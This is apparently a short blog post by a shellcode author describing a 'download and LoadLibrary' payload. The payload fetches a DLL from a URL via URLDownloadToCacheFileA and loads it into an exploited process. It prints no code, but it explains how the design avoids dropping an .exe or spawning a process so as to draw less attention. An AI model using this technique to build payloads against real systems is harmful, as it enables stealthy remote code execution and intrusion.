Everyone and their dog seems to want to use download and execute shellcode in their exploits. Even though this has some drawbacks:
- You need to create an .exe file on the system, which will very likely draw unwanted attention.
- You cannot use an API that downloads your file to a temporary location, because that will likely not retain the .exe extention.
- You need to make an assumption about where a safe place is to write your .exe file, which means you can guess wrong and the code fails.
- You need to store the string ‘.exe’ in the download & execute shellcode, which means this is 4 bytes larger.
- You need to spawn an extra process, which will very likely draw attention.
- You leave cleaning up the exploited process to the download & execute shellcode, which means this needs to be larger.
To get around these problems, I created download and LoadLibrary shellcode: a shellcode that will download a DLL file to a temporary file and load it into the exploited process using LoadLibrary. The benefits of this approach are:
- Smaller code.
- You can use the URLDownloadToCacheFileA API function in urlmon that downloads and saves your DLL to a temporary file, meaning you do not need to provide a location.
- No need to create an .exe file on the system: the extention of a DLL is irrelevant.
- No need to spawn an extra process.
- You can clean up the exploited process from the code in the DLL instead of the shellcode.
The size of the final shellcode depends on the length of the URL for your DLL. For most recent version of the code it is 138 bytes + the length of the URL. This is a pretty decent reduction from the average download and execute shellcodes of 200+ bytes (excluding the URL) that I found around the interwebs.